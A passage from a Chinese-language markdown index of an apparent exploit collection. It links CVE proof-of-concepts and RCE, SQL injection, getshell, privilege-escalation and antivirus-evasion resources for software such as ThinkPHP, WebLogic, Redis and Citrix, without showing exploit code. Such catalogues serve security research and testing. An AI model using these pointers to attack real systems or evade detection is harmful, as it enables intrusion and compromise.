[thinkphp5ๅ‘ฝไปคๆ‰ง่กŒ](thinkphp5ๅ‘ฝไปคๆ‰ง่กŒ.md) - [typechoๅๅบๅˆ—ๅŒ–ๆผๆดž](typechoๅๅบๅˆ—ๅŒ–ๆผๆดž.md) - [CVE-2019-10173 Xstream 1.4.10็‰ˆๆœฌ่ฟœ็จ‹ไปฃ็ ๆ‰ง่กŒ](CVE-2019-10173%20Xstream%201.4.10็‰ˆๆœฌ่ฟœ็จ‹ไปฃ็ ๆ‰ง่กŒๆผๆดž.md) - [IIS/CVE-2017-7269-Echo-PoC](./IIS/CVE-2017-7269-Echo-PoC) - [CVE-2019-15107 Webmin RCE](./CVE-2019-15107) - [thinkphp5 rceๆผๆดžๆฃ€ๆต‹ๅทฅๅ…ท](./tp5-getshell) - [thinkphp5_RCEๅˆ้›†](./tp5-getshell/TP5_RCEๅˆ้›†.md) - [thinkphp3.X-thinkphp5.x](./tp5-getshell/ThinkPHP.md) - [ๅ…ณไบŽThinkPHPๆก†ๆžถ็š„ๅŽ†ๅฒๆผๆดžๅˆ†ๆž้›†ๅˆ](https://github.com/Mochazz/ThinkPHP-Vuln) - [CVE-2019-11510](./CVE-2019-11510) - [Redis(<=5.0.5) RCE](./redis-rogue-server) - [Redis 4.x/5.x RCE๏ผˆไธปไปŽๅคๅˆถๅฏผ่‡ดRCE๏ผ‰](https://github.com/Ridter/redis-rce) - [็”ŸๆˆRedisๆถๆ„ๆจกๅ—soๆ–‡ไปถ้…ๅˆไธปไปŽๅคๅˆถRCE่พพๅˆฐๅ‘ฝไปคๆ‰ง่กŒ](https://github.com/n0b0dyCN/RedisModules-ExecuteCommand)|[็›ธๅ…ณๆ–‡็ซ ](https://www.freebuf.com/vuls/224235.html) - [RedisWriteFile-้€š่ฟ‡ `Redis` ไธปไปŽๅ†™ๅ‡บๆ— ๆŸๆ–‡ไปถ๏ผŒๅฏ็”จไบŽ `Windows` ๅนณๅฐไธ‹ๅ†™ๅ‡บๆ— ๆŸ็š„ `EXE`ใ€`DLL`ใ€ `LNK` ๅ’Œ `Linux` ไธ‹็š„ `OS` ็ญ‰ไบŒ่ฟ›ๅˆถๆ–‡ไปถ](https://github.com/r35tart/RedisWriteFile) - [WeblogicScanLot็ณปๅˆ—๏ผŒWeblogicๆผๆดžๆ‰น้‡ๆฃ€ๆต‹ๅทฅๅ…ท](./WeblogicScanLot) - [jboss_CVE-2017-12149](./jboss_CVE-2017-12149) - [Wordpress็š„ๆ‹’็ปๆœๅŠก๏ผˆDoS๏ผ‰-CVE-2018-6389](./CVE-2018-6389) - [Webmin Remote Code Execution (authenticated)-CVE-2019-15642](https://github.com/jas502n/CVE-2019-15642) - [CVE-2019-16131 OKLite v1.2.25 ไปปๆ„ๆ–‡ไปถไธŠไผ ๆผๆดž](./CVE-2019-16131%20OKLite%20v1.2.25%20ไปปๆ„ๆ–‡ไปถไธŠไผ ๆผๆดž.md) - [CVE-2019-16132 OKLite v1.2.25 ๅญ˜ๅœจไปปๆ„ๆ–‡ไปถๅˆ ้™คๆผๆดž](./CVE-2019-16132%20OKLite%20v1.2.25%20ๅญ˜ๅœจไปปๆ„ๆ–‡ไปถๅˆ ้™คๆผๆดž.md) - [CVE-2019-16309 FlameCMS 3.3.5 ๅŽๅฐ็™ปๅฝ•ๅค„ๅญ˜ๅœจsqlๆณจๅ…ฅๆผๆดž](./CVE-2019-16309%20FlameCMS%203.3.5%20ๅŽๅฐ็™ปๅฝ•ๅค„ๅญ˜ๅœจsqlๆณจๅ…ฅๆผๆดž.md) - [CVE-2019-16314 indexhibit cms v2.1.5 ๅญ˜ๅœจ้‡่ฃ…ๅนถๅฏผ่‡ดgetshell](./CVE-2019-16314%20indexhibit%20cms%20v2.1.5%20ๅญ˜ๅœจ้‡่ฃ…ๅนถๅฏผ่‡ดgetshell.md) - [ๆณ›ๅพฎOA็ฎก็†็ณป็ปŸRCEๆผๆดžๅˆฉ็”จ่„šๆœฌ](./ๆณ›ๅพฎOA็ฎก็†็ณป็ปŸRCEๆผๆดžๅˆฉ็”จ่„šๆœฌ.md) - [CVE-2019-16759 vBulletin 5.x 0day pre-auth RCE exploit](./CVE-2019-16759%20vBulletin%205.x%200day%20pre-auth%20RCE%20exploit.md) - [zentao-getshell ็ฆ…้“8.2 - 9.2.1ๅ‰ๅฐGetshell](./zentao-getshell) - [ๆณ›ๅพฎ e-cology OA ๅ‰ๅฐSQLๆณจๅ…ฅๆผๆดž](./ๆณ›ๅพฎ%20e-cology%20OA%20ๅ‰ๅฐSQLๆณจๅ…ฅๆผๆดž.md) - [Joomla-3.4.6-RCE](./Joomla-3.4.6-RCE.md) - [Easy File Sharing Web Server 7.2 - GET ็ผ“ๅ†ฒๅŒบๆบขๅ‡บ (SEH)](./Easy%20File%20Sharing%20Web%20Server%207.2%20-%20GET%20็ผ“ๅ†ฒๅŒบๆบขๅ‡บ%20(SEH).md) - [ๆž„ๅปบASMX็ป•่ฟ‡้™ๅˆถWAF่พพๅˆฐๅ‘ฝไปคๆ‰ง่กŒ(้€‚็”จไบŽASP.NET็Žฏๅขƒ)](./ๆž„ๅปบASMX็ป•่ฟ‡้™ๅˆถWAF่พพๅˆฐๅ‘ฝไปคๆ‰ง่กŒ.md) - [CVE-2019-17662-ThinVNC 1.0b1 - Authentication Bypass](./CVE-2019-17662-ThinVNC%201.0b1%20-%20Authentication%20Bypass.md) - [CVE-2019-16278andCVE-2019-16279-about-nostromo-nhttpd](./CVE-2019-16278andCVE-2019-16279-about-nostromo-nhttpd.md) - [CVE-2019-11043-PHP่ฟœ็จ‹ไปฃ็ ๆ‰ง่กŒๆผ](./CVE-2019-11043) - [ThinkCMFๆผๆดžๅ…จ้›†ๅ’Œ](./ThinkCMFๆผๆดžๅ…จ้›†ๅ’Œ.md) - [CVE-2019-7609-kibanaไฝŽไบŽ6.6.0ๆœชๆŽˆๆƒ่ฟœ็จ‹ไปฃ็ ๅ‘ฝไปคๆ‰ง่กŒ](./CVE-2019-7609-kibanaไฝŽไบŽ6.6.0ๆœชๆŽˆๆƒ่ฟœ็จ‹ไปฃ็ ๅ‘ฝไปคๆ‰ง่กŒ.md) - [ecologyExp.jar-ๆณ›ๅพฎecology OA็ณป็ปŸๆ•ฐๆฎๅบ“้…็ฝฎๆ–‡ไปถ่ฏปๅ–](./tools/ecologyExp.jar) - [freeFTP1.0.8-'PASS'่ฟœ็จ‹็ผ“ๅ†ฒๅŒบๆบขๅ‡บ](./freeFTP1.0.8-'PASS'่ฟœ็จ‹็ผ“ๅ†ฒๅŒบๆบขๅ‡บ.md) - [rConfig v3.9.2 RCEๆผๆดž](./rConfig%20v3.9.2%20RCEๆผๆดž.md) - [apache_solr_rce](./solr_rce.md) - [CVE-2019-7580 thinkcmf-5.0.190111ๅŽๅฐไปปๆ„ๆ–‡ไปถๅ†™ๅ…ฅๅฏผ่‡ด็š„ไปฃ็ ๆ‰ง่กŒ](CVE-2019-7580%20thinkcmf-5.0.190111ๅŽๅฐไปปๆ„ๆ–‡ไปถๅ†™ๅ…ฅๅฏผ่‡ด็š„ไปฃ็ ๆ‰ง่กŒ.md) - [Apache Flinkไปปๆ„JarๅŒ…ไธŠไผ ๅฏผ่‡ด่ฟœ็จ‹ไปฃ็ ๆ‰ง่กŒ](https://github.com/LandGrey/flink-unauth-rce) - [็”จไบŽๆฃ€ๆต‹JSONๆŽฅๅฃไปค็‰Œๅฎ‰ๅ…จๆ€งๆต‹่ฏ•](https://github.com/ticarpi/jwt_tool) - [cve-2019-17424 nipper-ng_0.11.10-Remote_Buffer_Overflow่ฟœ็จ‹็ผ“ๅ†ฒๅŒบๆบขๅ‡บ้™„PoC](cve-2019-17424%20nipper-ng_0.11.10-Remote_Buffer_Overflow่ฟœ็จ‹็ผ“ๅ†ฒๅŒบๆบขๅ‡บ้™„PoC.md) - [CVE-2019-12409_Apache_Solr RCE](https://github.com/jas502n/CVE-2019-12409) - [Shiro RCE (Padding Oracle Attack)](https://github.com/wuppp/shiro_rce_exp) - [CVE-2019-19634-class.upload.php <= 2.0.4ไปปๆ„ๆ–‡ไปถไธŠไผ ](https://github.com/jra89/CVE-2019-19634) - [Apache Solr RCE via Velocity Template Injection](./Apache%20Solr%20RCE%20via%20Velocity%20Template%20Injection.md) - [CVE-2019-10758-mongo-express before 0.54.0 is vulnerable to Remote Code Execution ](https://github.com/masahiro331/CVE-2019-10758/) - [CVE-2019-2107-Androidๆ’ญๆ”พ่ง†้ข‘-RCE-POC(Android 7.0็‰ˆๆœฌ๏ผŒ7.1.1็‰ˆๆœฌ๏ผŒ7.1.2็‰ˆๆœฌ๏ผŒ8.0็‰ˆๆœฌ๏ผŒ8.1็‰ˆๆœฌ๏ผŒ9.0็‰ˆๆœฌ)](https://github.com/marcinguy/CVE-2019-2107) - [CVE-2019-19844-Django้‡็ฝฎๅฏ†็ ๆผๆดž(ๅ—ๅฝฑๅ“็‰ˆๆœฌ:Django master branch,Django 3.0,Django 2.2,Django 1.11)](https://github.com/ryu22e/django_cve_2019_19844_poc/) - [CVE-2019-17556-unsafe-deserialization-in-apache-olingo(Apache Olingoๅๅบๅˆ—ๅŒ–ๆผๆดž๏ผŒๅฝฑๅ“: 4.0.0็‰ˆๆœฌ่‡ณ4.6.0็‰ˆๆœฌ)](https://medium.com/bugbountywriteup/cve-2019-17556-unsafe-deserialization-in-apache-olingo-8ebb41b66817) - [ZZCMS201910 SQL Injections](./ZZCMS201910%20SQL%20Injections.md) - [WDJACMS1.5.2ๆจกๆฟๆณจๅ…ฅๆผๆดž](./WDJACMS1.5.2ๆจกๆฟๆณจๅ…ฅๆผๆดž.md) - [CVE-2019-19781-Remote Code Execution Exploit for Citrix Application Delivery Controller and Citrix Gateway](https://github.com/projectzeroindia/CVE-2019-19781) - [CVE-2019-19781.nse---use Nmap check Citrix ADC Remote Code Execution](https://github.com/cyberstruggle/DeltaGroup/tree/master/CVE-2019-19781) - [Mysql Client ไปปๆ„ๆ–‡ไปถ่ฏปๅ–ๆ”ปๅ‡ป้“พๆ‹“ๅฑ•](https://paper.seebug.org/1112/) - [CVE-2020-5504-phpMyAdminๆณจๅ…ฅ(้œ€่ฆ็™ปๅฝ•)](https://xz.aliyun.com/t/7092) - [CVE-2020-5509-Car Rental Project 1.0็‰ˆๆœฌไธญๅญ˜ๅœจ่ฟœ็จ‹ไปฃ็ ๆ‰ง่กŒๆผๆดž](https://github.com/FULLSHADE/CVE-2020-5509-POC) - [CryptoAPI PoC CVE-2020-0601](https://github.com/kudelskisecurity/chainoffools/blob/master/README.md)|[ๅฆไธ€ไธชPoC for CVE-2020-0601](https://github.com/ollypwn/CVE-2020-0601) - [New Weblogic RCE (CVE-2020-2546ใ€CVE-2020-2551) CVE-2020-2546](https://mp.weixin.qq.com/s/Q-ZtX-7vt0JnjNbBmyuG0w)|[WebLogic WLSๆ ธๅฟƒ็ป„ไปถRCEๅˆ†ๆž๏ผˆCVE-2020-2551๏ผ‰](https://www.anquanke.com/post/id/199695)|[CVE-2020-2551-Weblogic IIOP ๅๅบๅˆ—ๅŒ–EXP](https://github.com/Y4er/CVE-2020-2551) - [CVE-2020-5398 - RFD(Reflected File Download) Attack for Spring MVC](https://github.com/motikan2010/CVE-2020-5398/) - [PHPOK v5.3&v5.4getshell](https://www.anquanke.com/post/id/194453) | [phpok V5.4.137ๅ‰ๅฐgetshellๅˆ†ๆž](https://forum.90sec.com/t/topic/728) | [PHPOK 4.7ไปŽๆณจๅ…ฅๅˆฐgetshell](https://xz.aliyun.com/t/1569) - [thinkphp6 session ไปปๆ„ๆ–‡ไปถๅˆ›ๅปบๆผๆดžๅค็Žฐ ๅซPOC](./books/thinkphp6%20session%20ไปปๆ„ๆ–‡ไปถๅˆ›ๅปบๆผๆดžๅค็Žฐ%20ๅซPOC.pdf) --- ๅŽŸๆ–‡ๅœจๆผๆดžๆŽจ้€ๅ…ฌไผ—ๅทไธŠ - [ThinkPHP 6.xๅๅบๅˆ—ๅŒ–POP้“พ๏ผˆไธ€๏ผ‰](./books/ThinkPHP%206.xๅๅบๅˆ—ๅŒ–POP้“พ๏ผˆไธ€๏ผ‰.pdf)|[ๅŽŸๆ–‡้“พๆŽฅ](https://mp.weixin.qq.com/s/rEjt9zb-AksiVwF1GngFww) - [ThinkPHP 6.xๅๅบๅˆ—ๅŒ–POP้“พ๏ผˆไบŒ๏ผ‰](./books/ThinkPHP%206.xๅๅบๅˆ—ๅŒ–POP้“พ๏ผˆไบŒ๏ผ‰.pdf)|[ๅŽŸๆ–‡้“พๆŽฅ](https://mp.weixin.qq.com/s/q8Xa3triuXEB3NoeOgka1g) - [ThinkPHP 6.xๅๅบๅˆ—ๅŒ–POP้“พ๏ผˆไธ‰๏ผ‰](./books/ThinkPHP%206.xๅๅบๅˆ—ๅŒ–POP้“พ๏ผˆไธ‰๏ผ‰.pdf)|[ๅŽŸๆ–‡้“พๆŽฅ](https://mp.weixin.qq.com/s/PFNt3yF0boE5lR2KofghBg) - [WordPress InfiniteWP - Client Authentication Bypass (Metasploit)](https://www.exploit-db.com/exploits/48047) - [ใ€Linuxๆๆƒ/RCEใ€‘OpenSMTPD 6.4.0 < 6.6.1 - Local Privilege Escalation + Remote Code Execution](https://www.exploit-db.com/exploits/48051) - [CVE-2020-7471-django1.11-1.11.282.2-2.2.103.0-3.0.3 StringAgg(delimiter)ไฝฟ็”จไบ†ไธๅฎ‰ๅ…จ็š„ๆ•ฐๆฎไผš้€ ๆˆSQLๆณจๅ…ฅๆผๆดž็Žฏๅขƒๅ’ŒPOC](https://github.com/Saferman/CVE-2020-7471) - [CVE-2019-17564 : Apache Dubboๅๅบๅˆ—ๅŒ–ๆผๆดž](https://www.anquanke.com/post/id/198747) - [CVE-2019-2725(CNVD-C-2019-48814ใ€WebLogic wls9-async)](https://github.com/lufeirider/CVE-2019-2725) - [YzmCMS 5.4 ๅŽๅฐgetshell](https://xz.aliyun.com/t/7231) - ๅ…ณไบŽGhostcat(ๅนฝ็ต็ŒซCVE-2020-1938ๆผๆดž)๏ผš[CNVD-2020-10487(CVE-2020-1938), tomcat ajp ๆ–‡ไปถ่ฏปๅ–ๆผๆดžpoc](https://github.com/nibiwodong/CNVD-2020-10487-Tomcat-ajp-POC)|[Java็‰ˆๆœฌPOC](https://github.com/0nise/CVE-2020-1938)|[Tomcat-Ajpๅ่ฎฎๆ–‡ไปถ่ฏปๅ–ๆผๆดž](https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi/)|[ๅˆไธ€ไธชpython็‰ˆๆœฌCVE-2020-1938ๆผๆดžๆฃ€ๆต‹](https://github.com/xindongzhuaizhuai/CVE-2020-1938)|[CVE-2020-1938-ๆผๆดžๅค็Žฐ็ŽฏๅขƒๅŠEXP](https://github.com/laolisafe/CVE-2020-1938) - [CVE-2020-8840๏ผšJackson-databind่ฟœ็จ‹ๅ‘ฝไปคๆ‰ง่กŒๆผๆดž๏ผˆๆˆ–ๅฝฑๅ“fastjson๏ผ‰](https://github.com/jas502n/CVE-2020-8840) - [CVE-2020-8813-Cacti v1.2.8 RCE่ฟœ็จ‹ไปฃ็ ๆ‰ง่กŒ EXPไปฅๅŠๅˆ†ๆž๏ผˆ้œ€่ฆ่ฎค่ฏ/ๆˆ–ๅผ€ๅฏ่ฎฟๅฎขๅณๅฏไธ้œ€่ฆ็™ปๅฝ•๏ผ‰(ไธ€ๆฌพLinuxๆ˜ฏๅŸบไบŽPHP,MySQL,SNMPๅŠRRDToolๅผ€ๅ‘็š„็ฝ‘็ปœๆต้‡็›‘ๆต‹ๅ›พๅฝขๅˆ†ๆžๅทฅๅ…ท)](https://shells.systems/cacti-v1-2-8-authenticated-remote-code-execution-cve-2020-8813/)|[EXP](./CVE-2020-8813%20-%20Cacti%20v1.2.8%20RCE.md)|[CVE-2020-8813MSFๅˆฉ็”จ่„šๆœฌ](https://www.exploit-db.com/exploits/48159) - [CVE-2020-7246-PHP้กน็›ฎ็ฎก็†็ณป็ปŸqdPM< 9.1 RCE](https://www.exploit-db.com/exploits/48146) - [CVE-2020-9547๏ผšFasterXML/jackson-databind ่ฟœ็จ‹ไปฃ็ ๆ‰ง่กŒๆผๆดž](https://github.com/fairyming/CVE-2020-9547) - [CVE-2020-9548๏ผšFasterXML/jackson-databind ่ฟœ็จ‹ไปฃ็ ๆ‰ง่กŒๆผๆดž](https://github.com/fairyming/CVE-2020-9548) - [Apache ActiveMQ 5.11.1็›ฎๅฝ•้ๅŽ†/ ShellไธŠไผ ](https://cxsecurity.com/issue/WLB-2020030033) - [CVE-2020-2555๏ผšWebLogic RCEๆผๆดžPOC](https://mp.weixin.qq.com/s/Wq6Fu-NlK8lzofLds8_zoA)|[CVE-2020-2555-Weblogic com.tangosol.util.extractor.ReflectionExtractor RCE](https://github.com/Y4er/CVE-2020-2555) - [CVE-2020-1947-Apache ShardingSphere UI YAML่งฃๆž่ฟœ็จ‹ไปฃ็ ๆ‰ง่กŒๆผๆดž](https://github.com/jas502n/CVE-2020-1947) - [CVE-2020-0554๏ผšphpMyAdminๅŽๅฐSQLๆณจๅ…ฅ](./CVE-2020-0554๏ผšphpMyAdminๅŽๅฐSQLๆณจๅ…ฅ.md) - [ๆณ›ๅพฎE-Mobile Ognl ่กจ่พพๅผๆณจๅ…ฅ](./ๆณ›ๅพฎe-mobile%20ognlๆณจๅ…ฅ.md)|[่กจ่พพๅผๆณจๅ…ฅ.pdf](./books/่กจ่พพๅผๆณจๅ…ฅ.pdf) - [้€š่พพOA RCEๆผๆดž](https://github.com/fuhei/tongda_rce)|[้€š่พพOAv11.6็‰ˆๆœฌRCEๅค็Žฐๅˆ†ๆž+EXP](./books/้€š่พพOAv11.6็‰ˆๆœฌๆผๆดžๅค็Žฐๅˆ†ๆž.pdf)-[EXPไธ‹่ฝฝ](./tools/้€š่พพOA_v11.6_RCE_EXP.py) - [CVE-2020-10673-jackson-databind JNDIๆณจๅ…ฅๅฏผ่‡ด่ฟœ็จ‹ไปฃ็ ๆ‰ง่กŒ](https://github.com/0nise/vuldebug) - [CVE-2020-10199ใ€CVE-2020-10204ๆผๆดžไธ€้”ฎๆฃ€ๆต‹ๅทฅๅ…ท๏ผŒๅ›พๅฝขๅŒ–็•Œ้ข๏ผˆSonatype Nexus <3.21.1๏ผ‰](https://github.com/magicming200/CVE-2020-10199_CVE-2020-10204) - [CVE-2020-2555-Oracle Coherence ๅๅบๅˆ—ๅŒ–ๆผๆดž](https://github.com/wsfengfan/CVE-2020-2555)|[ๅˆ†ๆžๆ–‡็ซ ](https://paper.seebug.org/1141/) - [cve-2020-5260-Gitๅ‡ญ่ฏๆณ„้œฒๆผๆดž](https://github.com/brompwnie/cve-2020-5260) - [้€š่พพOAๅ‰ๅฐไปปๆ„็”จๆˆทไผช้€ ็™ปๅฝ•ๆผๆดžๆ‰น้‡ๆฃ€ๆต‹](./้€š่พพOAๅ‰ๅฐไปปๆ„็”จๆˆทไผช้€ ็™ปๅฝ•ๆผๆดžๆ‰น้‡ๆฃ€ๆต‹.md) - [CVE-2020-11890 JoomlaRCE <3.9.17 ่ฟœ็จ‹ๅ‘ฝไปคๆ‰ง่กŒๆผๆดž(้œ€่ฆๆœ‰ๆ•ˆ็š„่ดฆๅทๅฏ†็ )](https://github.com/HoangKien1020/CVE-2020-11890) - [CVE-2020-10238ใ€JoomlaRCE <= 3.9.15 ่ฟœ็จ‹ๅ‘ฝไปคๆ‰ง่กŒๆผๆดž(้œ€่ฆๆœ‰ๆ•ˆ็š„่ดฆๅทๅฏ†็ )ใ€‘&CVE-2020-10239ใ€JoomlaRCE 3.7.0 to 3.9.15 ่ฟœ็จ‹ๅ‘ฝไปคๆ‰ง่กŒๆผๆดž(้œ€่ฆๆœ‰ๆ•ˆ็š„่ดฆๅทๅฏ†็ )ใ€‘](https://github.com/HoangKien1020/CVE-2020-10238) - [CVE-2020-2546๏ผŒCVE-2020-2915 CVE-2020-2801 CVE-2020-2798 CVE-2020-2883 CVE-2020-2884 CVE-2020-2950 WebLogic T3 payload exploit poc python3](https://github.com/hktalent/CVE_2020_2546)|[CVE-2020-2883-Weblogic coherence.jar RCE](https://github.com/Y4er/CVE-2020-2883)|[WebLogic-Shiro-shell-WebLogicๅˆฉ็”จCVE-2020-2883ๆ‰“Shiro rememberMeๅๅบๅˆ—ๅŒ–ๆผๆดž๏ผŒไธ€้”ฎๆณจๅ†Œfilterๅ†…ๅญ˜shell](https://github.com/Y4er/WebLogic-Shiro-shell) - [tongda_oa_rce-้€š่พพoa ่ถŠๆƒ็™ปๅฝ•+ๆ–‡ไปถไธŠไผ getshell](https://github.com/clm123321/tongda_oa_rce) - [CVE-2020-11651-SaltStack Proof of Conceptใ€่ฎค่ฏ็ป•่ฟ‡RCEๆผๆดžใ€‘](https://github.com/0xc0d/CVE-2020-11651)|[CVE-2020-11651&&CVE-2020-11652 EXP](https://github.com/heikanet/CVE-2020-11651-CVE-2020-11652-EXP) - [showdoc็š„api_pageๅญ˜ๅœจไปปๆ„ๆ–‡ไปถไธŠไผ getshell](./showdoc็š„api_pageๅญ˜ๅœจไปปๆ„ๆ–‡ไปถไธŠไผ getshell.md) - [Fastjson <= 1.2.47 ่ฟœ็จ‹ๅ‘ฝไปคๆ‰ง่กŒๆผๆดžๅˆฉ็”จๅทฅๅ…ทๅŠๆ–นๆณ•](https://github.com/CaijiOrz/fastjson-1.2.47-RCE) - [SpringBoot_Actuator_RCE](https://github.com/jas502n/SpringBoot_Actuator_RCE) - [jizhicms(ๆž่‡ดCMS)v1.7.1ไปฃ็ ๅฎก่ฎก-ไปปๆ„ๆ–‡ไปถไธŠไผ getshell+sqlๆณจๅ…ฅ+ๅๅฐ„XSS](./books/jizhicms(ๆž่‡ดCMS)v1.7.1ไปฃ็ ๅฎก่ฎกๅผ•ๅ‘็š„ๆ€่€ƒ.pdf) - [CVE-2020-9484๏ผšApache Tomcat Session ๅๅบๅˆ—ๅŒ–ไปฃ็ ๆ‰ง่กŒๆผๆดž](./tools/CVE-2020-9484.tgz)|[CVE-2020-9484๏ผšApache Tomcat ๅๅบๅˆ—ๅŒ–RCEๆผๆดž็š„ๅˆ†ๆžๅ’Œๅˆฉ็”จ](https://www.redtimmy.com/java-hacking/apache-tomcat-rce-by-deserialization-cve-2020-9484-write-up-and-exploit/) - [PHPOK ๆœ€ๆ–ฐ็‰ˆๆผๆดž็ป„ๅˆๆ‹ณ GETSHELL](./books/PHPOKๆœ€ๆ–ฐ็‰ˆๆผๆดž็ป„ๅˆๆ‹ณGETSHELL.pdf) - [Apache Kylin 3.0.1ๅ‘ฝไปคๆณจๅ…ฅๆผๆดž](https://community.sonarsource.com/t/apache-kylin-3-0-1-command-injection-vulnerability/25706) - [weblogic T3 collections java InvokerTransformer Transformer InvokerTransformer weblogic.jndi.WLInitialContextFactory](https://github.com/hktalent/weblogic_java_des) - [CVE-2020-5410 Spring Cloud Config็›ฎๅฝ•็ฉฟ่ถŠๆผๆดž](https://xz.aliyun.com/t/7877) - [NewZhan CMS ๅ…จ็‰ˆๆœฌ SQLๆณจๅ…ฅ๏ผˆ0day๏ผ‰](./books/NewZhan%20CMS%20ๅ…จ็‰ˆๆœฌ%20SQLๆณจๅ…ฅ๏ผˆ0day๏ผ‰.pdf) - [็›ฒๆณจ or ่”ๅˆ๏ผŸ่ฎฐไธ€ๆฌก้‡่ง็š„ๅฅ‡่‘ฉๆณจๅ…ฅ็‚นไน‹SEMCMS3.9๏ผˆ0day๏ผ‰](./books/็›ฒๆณจ%20or%20่”ๅˆ๏ผŸ่ฎฐไธ€ๆฌก้‡่ง็š„ๅฅ‡่‘ฉๆณจๅ…ฅ็‚นไน‹SEMCMS3.9๏ผˆ0day๏ผ‰.pdf) - [ไปŽPbootCMS(2.0.3&2.0.7ๅ‰ๅฐRCE+2.0.8ๅŽๅฐRCE)ๅฎก่ฎกๅˆฐๆŸ็‹—็ป•่ฟ‡](./books/ไปŽPbootCMS(2.0.3&2.0.7ๅ‰ๅฐRCE+2.0.8ๅŽๅฐRCE)ๅฎก่ฎกๅˆฐๆŸ็‹—็ป•่ฟ‡.pdf) - [CVE-2020-1948 : Apache Dubbo ่ฟœ็จ‹ไปฃ็ ๆ‰ง่กŒๆผๆดž](https://github.com/ctlyz123/CVE-2020-1948) - [CVE-2020-5902-F5 BIG-IP ่ฟœ็จ‹ไปฃไปฃ็ ๆ‰ง่กŒ๏ผˆRCE๏ผ‰&ไปปๆ„ๆ–‡ไปถๅŒ…ๅซ่ฏปๅ–](https://github.com/jas502n/CVE-2020-5902)|[CVE-2020-5902ๅˆไธ€EXPๅŠ ๆต‹่ฏ•dockerๆ–‡ไปถ](https://github.com/superzerosec/cve-2020-5902) - [CVE-2020-8193-CitrixๆœชๆŽˆๆƒ่ฎฟ้—ฎไปปๆ„ๆ–‡ไปถ่ฏปๅ–](https://github.com/jas502n/CVE-2020-8193) - [้€š่ฏปๅฎก่ฎกไน‹ๅคฉ็›ฎMVC_Tๆก†ๆžถๅธฆHome็‰ˆ(temmokumvc)_v2.01](./books/้€š่ฏปๅฎก่ฎกไน‹ๅคฉ็›ฎMVC_Tๆก†ๆžถๅธฆHome็‰ˆ(temmokumvc)_v2.01.pdf) - [CVE-2020-14645-WebLogic ่ฟœ็จ‹ไปฃ็ ๆ‰ง่กŒๆผๆดž](https://github.com/Y4er/CVE-2020-14645)|[Weblogic_CVE-2020-14645](https://github.com/DSO-Lab/Weblogic_CVE-2020-14645) - [CVE-2020-6287-SAP NetWeaver AS JAVA ๆŽˆๆƒ้—ฎ้ข˜ๆผๆดž-ๅˆ›ๅปบ็”จๆˆทEXP](https://github.com/duc-nt/CVE-2020-6287-exploit)|[SAP_RECON-PoC for CVE-2020-6287, CVE-2020-6286 (SAP RECON vulnerability)](https://github.com/chipik/SAP_RECON) - [CVE-2018-1000861, CVE-2019-1003005 and CVE-2019-1003029-jenkins-rce](https://github.com/orangetw/awesome-jenkins-rce-2019) - [CVE-2020-3452๏ผšCisco ASA/FTD ไปปๆ„ๆ–‡ไปถ่ฏปๅ–ๆผๆดž](./CVE-2020-3452๏ผšCisco_ASAFTDไปปๆ„ๆ–‡ไปถ่ฏปๅ–ๆผๆดž.md) - [74CMS_v5.0.1ๅŽๅฐRCEๅˆ†ๆž](./books/74CMS_v5.0.1ๅŽๅฐRCEๅˆ†ๆž.pdf) - [CVE-2020-8163 - Remote code execution of user-provided local names in Rails](https://github.com/sh286/CVE-2020-8163) - [ใ€0day RCEใ€‘Horde Groupware Webmail Edition RCE](./%E3%80%900day%20RCE%E3%80%91Horde%20Groupware%20Webmail%20Edition%20RCE.md) ## <span id="head5"> ๆๆƒ่พ…ๅŠฉ็›ธๅ…ณ</span> - [windows-kernel-exploits Windowsๅนณๅฐๆๆƒๆผๆดž้›†ๅˆ](https://github.com/SecWiki/windows-kernel-exploits) - [windows ๆบขๅ‡บๆๆƒๅฐ่ฎฐ](https://klionsec.github.io/2017/04/22/win-0day-privilege/)/[ๆœฌๅœฐไฟๅญ˜ไบ†ไธ€ไปฝ+Linux&Windowsๆๅ–่„‘ๅ›พ](./tools/Local%20Privilege%20Escalation.md) - [Windowsๅธธ่งๆŒไน…ๆŽงๅˆถ่„‘ๅ›พ](./tools/Windowsๅธธ่งๆŒไน…ๆŽงๅˆถ.png) - [CVE-2019-0803 Win32kๆผๆดžๆๆƒๅทฅๅ…ท](./CVE-2019-0803) - [่„็‰›Linuxๆๆƒๆผๆดž](https://github.com/Brucetg/DirtyCow-EXP) - [่ฟœๆŽงๅ…ๆ€ไปŽๅ…ฅ้—จๅˆฐๅฎž่ทตไน‹็™ฝๅๅ•๏ผˆ113ไธช๏ผ‰](https://github.com/TideSec/BypassAntiVirus)|[่ฟœๆŽงๅ…ๆ€ไปŽๅ…ฅ้—จๅˆฐๅฎž่ทตไน‹็™ฝๅๅ•๏ผˆ113ไธช๏ผ‰ๆ€ป็ป“็ฏ‡.pdf](./books/่ฟœๆŽงๅ…ๆ€ไปŽๅ…ฅ้—จๅˆฐๅฎž่ทตไน‹็™ฝๅๅ•๏ผˆ113ไธช๏ผ‰ๆ€ป็ป“็ฏ‡.pdf) - [Linuxๆๆƒ-CVE-2019-13272 A linux kernel Local Root Privilege Escalation vulnerability with PTRACE_TRACEME](https://github.com/jiayy/android_vuln_poc-exp/tree/master/EXP-CVE-2019-13272-aarch64) - [Linuxๆƒ้™ๆๅ‡่พ…ๅŠฉไธ€้”ฎๆฃ€ๆต‹ๅทฅๅ…ท](https://github.com/mzet-/linux-exploit-suggester) - [ๅฐ†powershell่„šๆœฌ็›ดๆŽฅๆณจๅ…ฅๅˆฐ่ฟ›็จ‹ไธญๆ‰ง่กŒๆฅ็ป•่ฟ‡ๅฏนpowershell.exe็š„้™ๅˆถ](https://github.com/EmpireProject/PSInject) - [CVE-2020-2696 โ€“ Local privilege escalation via CDE dtsession](https://github.com/0xdea/exploits/blob/master/solaris/raptor_dtsession_ipa.c) - [CVE-2020-0683-ๅˆฉ็”จWindows MSI โ€œInstaller serviceโ€ๆๆƒ](https://github.com/padovah4ck/CVE-2020-0683/) - [Linux sudoๆๆƒ่พ…ๅŠฉๅทฅๅ…ทโ€”ๆŸฅๆ‰พsudoๆƒ้™้…็ฝฎๆผๆดž](https://github.com/TH3xACE/SUDO_KILLER) - [Windowsๆๆƒ-CVE-2020-0668๏ผšWindows Service Tracingๆœฌๅœฐๆๆƒๆผๆดž](https://github.com/RedCursorSecurityConsulting/CVE-2020-0668) - [Linuxๆๅ–-Linux kernel XFRM UAF poc (3.x - 5.x 